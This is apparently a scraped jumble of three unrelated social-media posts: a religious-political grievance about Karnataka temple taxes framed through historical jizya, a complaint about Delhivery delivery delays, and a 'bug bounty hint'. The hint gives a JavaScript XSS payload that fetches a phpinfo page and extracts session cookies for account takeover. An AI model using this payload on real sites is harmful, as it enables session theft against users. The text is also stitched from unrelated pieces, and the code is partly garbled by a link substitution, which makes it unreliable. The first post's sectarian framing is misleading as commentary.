I am amazed by the fact that our ancestors were ready to give zizya for decades but not ready to convert ,ready to die but not ready to convert and now comes Karnataka where just for a few units of free electricity,temples have to pay taxes to Common Fund pool
@delhivery@help_delhivery worst delivery experience of my life my package delivery dates keep on changing since 5th of April it was supposed to deliver on 12th of April but since that day the app keep on increasing day one by one.
#delhivery#delayed#worst#experience
Bug Bounty Hint
Found PHPinfo page?
You can use XSS to extract user cookies from it and achieve an account takeover.
x=new XMLHttpRequest();
https://t.co/oz5fItv2kU('GET','//host/phpinfo',0);
x.send();regex=/COOKIE'.*v">(.*?)</m;
alert(x.responseText.match(regex)[1]);
Cheers